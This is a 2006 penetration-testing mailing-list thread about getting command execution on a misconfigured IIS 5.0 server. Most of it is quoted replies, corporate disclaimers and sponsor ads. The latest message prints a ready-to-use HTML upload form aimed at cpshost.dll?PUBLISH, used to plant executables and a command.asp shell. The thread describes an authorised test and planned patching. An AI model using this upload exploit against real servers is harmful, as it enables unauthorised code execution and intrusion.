Re: privelege escalation with .bat files

What I did is I read up on the documentation, and figured out how to make 
the following html form which I could upload executables to cpshost.dll(and 
eventually upload a command.asp):

<html>
<body>
<h2 align="center">cpshost.dll upload form</h2>
<hr>
<form enctype="multipart/form-data" 
action="TARGETHOST.COM/scripts/cpshost.dll?PUBLISH" method="POST">
 <center><table border="1">
   <tr>
     <th align="center" colspan="2">Using Visible Form Field</th>
   </tr>
   <tr>
     <th align="left">File to upload</th>
     <td align="left"><input name="file" type="file" size="30"></td>
   </tr>
   <tr>
     <th align="left">Destination URL</th>
     <td align="left"><input type="text" name="TargetURL" value="/scripts/" 
size="30">
     <input type="Submit" value="Upload..."></td>
   </tr>
 </table></center>
</form>
</body>
</html>

I hope this helps you guys as much as you helped me.  The client is very 
happy and I now have the job of patching this vulnerability(shouldn't be 
nearly as difficult as finding it).

P.S. I mispelled cpshost.dll in my previous post(s).  Forgot the "s"

--ben


> From: tony.dimichele@americas.bnpparibas.com
> To: bengreenb@hotmail.com
> Subject: Re: privelege escalation with .bat files
> Date: Tue, 25 Apr 2006 15:50:38 -0400
>
> Good find.  Any chance you could shoot me the POST you crafted?
>
>
>
>
> Internet
> bengreenb@hotmail.com
> 04/25/2006 03:41 PM
>
> To
> Tony DIMICHELE
> cc
>
> Subject
> Re: privelege escalation with .bat files
>
>
>
>
>
>
>
> It turns out that I was able to use cphost.dll to get command access.
> We're
> gonna secure the server.  If it weren't for cphost.dll, I don't think I
> had
> enough OPTIONS to execute the .bat.
>
> >From: tony.dimichele@americas.bnpparibas.com
> >To: bengreenb@hotmail.com
> >Subject: Re: privelege escalation with .bat files
> >Date: Tue, 25 Apr 2006 11:09:11 -0400
> >
> >I'm not sure that the POSTis going to help you.  The IIS server should
> >handle requests based upon the extension associated with the requested
> >file.  Can you upload and execute .cgi, .pl, or any other 'possibly'
> >executable files?
> >
> >Are you using netcat?  Have you performed a performed an OPTIONS request
> >to see what other requests are at your disposal?
> >
> >OPTIONS * HTTP/1.0
> >
> >
> >
> >
> >
> >
> >Internet
> >bengreenb@hotmail.com
> >04/25/2006 10:41 AM
> >
> >To
> >Tony DIMICHELE
> >cc
> >
> >Subject
> >Re: privelege escalation with .bat files
> >
> >
> >
> >
> >
> >
> >
> >I'm trying to figure out if I can execute.  If I make a get request, my
> >browser tries to download.  I was thinking perhaps a POST request could
> >have
> >the script treat it as a cgi, the same way it does .exe's.
> >
> >--ben
> >
> > >From: tony.dimichele@americas.bnpparibas.com
> > >To: bengreenb@hotmail.com
> > >Subject: Re: privelege escalation with .bat files
> > >Date: Tue, 25 Apr 2006 10:09:32 -0400
> > >
> > >Take a look at CALCS.exe  - http://www.computerhope.com/cacls.htm
> > >Can you execute the batch file after uploading or do you need to
> escalate
> > >priveleges before you can execute your batch file?
> > >
> > >
> > >
> > >
> > >Extranet
> > >bengreenb@hotmail.com
> > >04/24/2006 12:25 PM
> > >
> > >To
> > >pen-test
> > >cc
> > >
> > >Subject
> > >privelege escalation with .bat files
> > >
> > >
> > >
> > >
> > >
> > >
> > >Hi.  I'm pen-testing an IIS 5.0 server that is insecurely set up to
> allow
> > >write-access to it as a web folder.  However, its also set up to deny
> > >copying (or renaming to) of the following file extensions .asp, .com,
> > >.cmd,
> > >.exe, and .dll. Interestingly, it does allow .bat files to be written
> >onto
> > >the server.  Is there a way to escalate privelleges (and possibly get a
> > >command prompt) through a .bat file?  Thank you,
> > >
> > >--ben
> > >
> > >
> > >
> >
> >------------------------------------------------------------------------------
> > >This List Sponsored by: Cenzic
> > >
> > >Concerned about Web Application Security?
> > >Why not go with the #1 solution - Cenzic, the only one to win the
> > >Analyst's
> > >Choice Award from eWeek. As attacks through web applications continue
> to
> > >rise,
> > >you need to proactively protect your applications from hackers. Cenzic
> >has
> > >the
> > >most comprehensive solutions to meet your application security
> >penetration
> > >testing and vulnerability management needs. You have an option to go
> with
> > >a
> > >managed service (Cenzic ClickToSecure) or an enterprise software
> > >(Cenzic Hailstorm). Download FREE whitepaper on how a managed service
> can
> > >help you: http://www.cenzic.com/news_events/wpappsec.php
> > >And, now for a limited time we can do a FREE audit for you to confirm
> >your
> > >results from other product. Contact us at request@cenzic.com for
> details.
> >
> >------------------------------------------------------------------------------
> > >
> > >
> > >This message and any attachments (the "message") is
> > >intended solely for the addressees and is confidential.
> > >If you receive this message in error, please delete it and
> > >immediately notify the sender. Any use not in accord with
> > >its purpose, any dissemination or disclosure, either whole
> > >or partial, is prohibited except formal approval. The internet
> > >can not guarantee the integrity of this message.
> > >BNP PARIBAS (and its subsidiaries) shall (will) not
> > >therefore be liable for the message if modified.
> > >
> > >                 ---------------------------------------------
> > >
> > >Ce message et toutes les pieces jointes (ci-apres le
> > >"message") sont etablis a l'intention exclusive de ses
> > >destinataires et sont confidentiels. Si vous recevez ce
> > >message par erreur, merci de le detruire et d'en avertir
> > >immediatement l'expediteur. Toute utilisation de ce
> > >message non conforme a sa destination, toute diffusion
> > >ou toute publication, totale ou partielle, est interdite, sauf
> > >autorisation expresse. L'internet ne permettant pas
> > >d'assurer l'integrite de ce message, BNP PARIBAS (et ses
> > >filiales) decline(nt) toute responsabilite au titre de ce
> > >message, dans l'hypothese ou il aurait ete modifie.
> > >
> >
> >
> >
> >This message and any attachments (the "message") is
> >intended solely for the addressees and is confidential.
> >If you receive this message in error, please delete it and
> >immediately notify the sender. Any use not in accord with
> >its purpose, any dissemination or disclosure, either whole
> >or partial, is prohibited except formal approval. The internet
> >can not guarantee the integrity of this message.
> >BNP PARIBAS (and its subsidiaries) shall (will) not
> >therefore be liable for the message if modified.
> >
> >                 ---------------------------------------------
> >
> >Ce message et toutes les pieces jointes (ci-apres le
> >"message") sont etablis a l'intention exclusive de ses
> >destinataires et sont confidentiels. Si vous recevez ce
> >message par erreur, merci de le detruire et d'en avertir
> >immediatement l'expediteur. Toute utilisation de ce
> >message non conforme a sa destination, toute diffusion
> >ou toute publication, totale ou partielle, est interdite, sauf
> >autorisation expresse. L'internet ne permettant pas
> >d'assurer l'integrite de ce message, BNP PARIBAS (et ses
> >filiales) decline(nt) toute responsabilite au titre de ce
> >message, dans l'hypothese ou il aurait ete modifie.
> >
>
>
>
> This message and any attachments (the "message") is
> intended solely for the addressees and is confidential.
> If you receive this message in error, please delete it and
> immediately notify the sender. Any use not in accord with
> its purpose, any dissemination or disclosure, either whole
> or partial, is prohibited except formal approval. The internet
> can not guarantee the integrity of this message.
> BNP PARIBAS (and its subsidiaries) shall (will) not
> therefore be liable for the message if modified.
>
>                 ---------------------------------------------
>
> Ce message et toutes les pieces jointes (ci-apres le
> "message") sont etablis a l'intention exclusive de ses
> destinataires et sont confidentiels. Si vous recevez ce
> message par erreur, merci de le detruire et d'en avertir
> immediatement l'expediteur. Toute utilisation de ce
> message non conforme a sa destination, toute diffusion
> ou toute publication, totale ou partielle, est interdite, sauf
> autorisation expresse. L'internet ne permettant pas
> d'assurer l'integrite de ce message, BNP PARIBAS (et ses
> filiales) decline(nt) toute responsabilite au titre de ce
> message, dans l'hypothese ou il aurait ete modifie.



------------------------------------------------------------------------------
This List Sponsored by: Cenzic

Concerned about Web Application Security? 
Why not go with the #1 solution - Cenzic, the only one to win the Analyst's 
Choice Award from eWeek. As attacks through web applications continue to rise, 
you need to proactively protect your applications from hackers. Cenzic has the 
most comprehensive solutions to meet your application security penetration 
testing and vulnerability management needs. You have an option to go with a 
managed service (Cenzic ClickToSecure) or an enterprise software 
(Cenzic Hailstorm). Download FREE whitepaper on how a managed service can 
help you: http://www.cenzic.com/news_events/wpappsec.php 
And, now for a limited time we can do a FREE audit for you to confirm your 
results from other product. Contact us at request@cenzic.com for details.
------------------------------------------------------------------------------